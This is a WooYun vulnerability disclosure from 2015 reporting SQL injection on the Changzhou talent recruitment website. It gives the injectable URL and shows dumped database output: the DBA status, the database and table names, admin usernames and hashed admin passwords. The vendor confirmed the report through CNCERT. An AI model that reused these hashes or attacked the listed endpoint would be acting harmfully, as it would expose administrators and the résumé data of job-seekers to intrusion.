当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095978

漏洞标题:常州人才网主站注入-好多数据啊

相关厂商:cncert国家互联网应急中心

漏洞作者: XXXQQ

提交时间:2015-02-06 18:28

修复时间:2015-03-23 18:30

公开时间:2015-03-23 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

主站存在注入,权限还DBA,数据好多

详细说明:

地址:http://www.czrc.com.cn/wlzpjxh/WGR25.php?id=1698

22.png


current user:    'czrc2014@%'
current database: 'czrcphpjob'
current user is DBA: True
available databases [6]:
[*] czrcphpjob
[*] czrctemp
[*] information_schema
[*] mysql
[*] phpjob
[*] test_czrc
database management system users [4]:
[*] 'czrc2014'@'%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
| dm_qyxz |
| jlencms_cj_config |
| jlencms_fs_area |
| jlencms_fs_browser |
| jlencms_fs_config |
| jlencms_fs_days |
| jlencms_fs_engine |
| jlencms_fs_engine_config |
| jlencms_fs_ip |
| jlencms_fs_keyword |
| jlencms_fs_lang |
| jlencms_fs_main |
| jlencms_fs_main_10min |
| jlencms_fs_main_31day |
| jlencms_fs_main_3month |
| jlencms_fs_main_area |
| jlencms_fs_main_bak |
| jlencms_fs_main_tmp |
| jlencms_fs_os |
| jlencms_fs_resolution |
| jlencms_fs_total |
| jlencms_ga_gbook |
| jlencms_ga_gbook_statelist |
| jlencms_ga_gbook_templates |
| jlencms_ga_ysqgk |
| jlencms_ga_ysqgk_statelist |
| jlencms_ga_ysqgk_templates |
| jlencms_gb_class |
| jlencms_gb_news |
| jlencms_me_base |
| jlencms_me_base_919 |
| jlencms_me_base_del |
| jlencms_me_base_no_resume |
| jlencms_me_base_view |
| jlencms_me_pointcard |
| jlencms_me_viewer |
| jlencms_mf_admin |
| jlencms_mf_ads |
| jlencms_mf_ads_class |
| jlencms_mf_ads_group |
| jlencms_mf_ads_stat |
| jlencms_mf_defineclass |
| jlencms_mf_definedata |
| jlencms_mf_definetable |
| jlencms_mf_depart |
| jlencms_mf_label |
| jlencms_mf_label_class |
| jlencms_mf_labelstyle |
| jlencms_mf_labelstyle_class |
| jlencms_mf_links |
| jlencms_mf_links_class |
| jlencms_mf_links_config |
| jlencms_mf_loginlog |
| jlencms_mf_role |
| jlencms_mf_searchlog |
| jlencms_mf_tablelog |
| jlencms_mf_uploadlog |
| jlencms_mf_worklog |
| jlencms_ns_class |
| jlencms_ns_config |
| jlencms_ns_news |
| jlencms_ns_newsset |
| jlencms_ns_todaypic |
| jlencms_rc_ads |
| jlencms_rc_advepost |
| jlencms_rc_adver |
| jlencms_rc_blacklist |
| jlencms_rc_chase |
| jlencms_rc_collection |
| jlencms_rc_company |
| jlencms_rc_company_bak |
| jlencms_rc_company_depart |
| jlencms_rc_company_interview |
| jlencms_rc_company_recommend |
| jlencms_rc_company_statinfo |
| jlencms_rc_contract |
| jlencms_rc_cpnranking |
| jlencms_rc_expel |
| jlencms_rc_favorites |
| jlencms_rc_fwadvepost |
| jlencms_rc_fwblacklist |
| jlencms_rc_fwseat |
| jlencms_rc_fwseatjoins |
| jlencms_rc_fwseatlist |
| jlencms_rc_fwseatreser |
| jlencms_rc_jobs |
| jlencms_rc_jobs_agent |
| jlencms_rc_jobs_applylog |
| jlencms_rc_jobs_applyoklog |
| jlencms_rc_jobs_bak |
| jlencms_rc_jobs_copy |
| jlencms_rc_jobs_searcher |
| jlencms_rc_letter |
| jlencms_rc_logs |
| jlencms_rc_message |
| jlencms_rc_msg2admin |
| jlencms_rc_mysearch |
| jlencms_rc_newss |
| jlencms_rc_newssorder |
| jlencms_rc_orderlist |
| jlencms_rc_record |
| jlencms_rc_resume |
| jlencms_rc_resume_20111101_noshiyong |
| jlencms_rc_resume_201411171649 |
| jlencms_rc_resume_cert |
| jlencms_rc_resume_computer |
| jlencms_rc_resume_edu |
| jlencms_rc_resume_file |
| jlencms_rc_resume_language |
| jlencms_rc_resume_project |
| jlencms_rc_resume_searcher |
| jlencms_rc_resume_training |
| jlencms_rc_resume_viewlog |
| jlencms_rc_resume_vod |
| jlencms_rc_resume_workexp |
| jlencms_rc_seat |
| jlencms_rc_seatlist |
| jlencms_rc_seatreser |
| jlencms_rc_tele |
| jlencms_rc_template |
| jlencms_rc_user_collect |
| jlencms_rc_viewed |
| jlencms_rc_viewedto |
| jlencms_rc_viewerlog |
| jlencms_rc_webseat |
| jlencms_rc_webseatlist |
| jlencms_rc_webseatreser |
| jlencms_sms_log |
| jlencms_sms_outbox |
| jlencms_vs_vote |
| jlencms_vs_vote_copy |
| shouji_tongji |
| tb_Audition_appointment |
| tb_Audition_feedback |
| tb_OnLineUser |
| tb_comp_ms_log |
| tb_company_service_detail |
| tb_conpany_room |
| tb_data_dict |
| tb_detail_subject |
| tb_industry_classify |
| tb_job_classify |
| tb_me_base |
| tb_member_base |
| tb_online |
| tb_rc_company_recommendation |
| tb_rc_company_refine |
| tb_rc_jobs_refine |
| tb_rc_resume |
| tb_resume_audi_history |
| tb_resume_cancel |
| tb_resume_offer |
| tb_resume_send |
| tb_set_room |
| tb_subject_classify |
| tb_subject_classify_copy |
| tb_subject_relevance |
| tb_track |
| tb_university |
| tb_work_city |
| zshouji |


漏洞证明:

| adminname |
+-----------+
| admin1 |
| duhw |
| fyx |
| hy |
| hycx |
| jinqing |
| jm |
| kjc |
| lh_1 |
| swg |
| syy |
| tnrc |
| tq |
| wanglei |
| xbrc |
| xia |
| xieke |
| xuely |
| ydd |
| ylp |
| ysj |
| zhangl |
| zhuqi |
| zoudan |
| zw |
| zy |
adminpwd |
+----------------------------------+
| 06f87f3682d81e8abbe03ca572c369bc |
| 0fa1e70e66d28d91aa5581903ebe7834 |
| 14e1b600b1fd579f47433b88e8d85291 |
| 1e7eebb19ca71233686f26a43bbc18a9 |
| 32b76369c2d5d0388999e30e234df63e |
| 34eb3200e48c751f48ffe4553e463359 |
| 4718853687ce9f1802eaa00fb069aafd |
| 5c14594732b102fc2b38c94d10a52c21 |
| 83e09b42e88b676b1050880557f57c48 |
| 83e09b42e88b676b1050880557f57c48 |
| 90c22fe98f1890056b79127a81f7213b |
| 9385d9a463a3191488e45d4fac191212 |
| 9b950b4a849a9dbfccd1593c303ead73 |
| a4130ad461268d6e63580916a26107d6 |
| a4130ad461268d6e63580916a26107d6 |
| a674c74effca6d46723d05980a793321 |
| b1b90d6f3f8d0cb428b40ce01311ed73 |
| b4f4aa2b8d4c70d29672b1ec60acb671 |
| b77a28e9840dff6bc5b00ee5455c40e3 |
| b7d924e94420c2ab8af2f5315dff8edc |
| bc8fe80b3ab5211d85fc6ad8eb0336ef |
| c340118b415903d19fa5e7f1797542e6 |
| d3d35285899c9c7eb064cb75541ddcf9 |
| dc1516854faa5d1228caa4b726e9b525 |
| f4e157fd32fcab39087b81c9d68d44fa |
| f9e8beb34db5c7881e2bedda3cfa0eec |

修复方案:

请仔细检查

版权声明:转载请注明来源 XXXQQ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-11 13:51

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论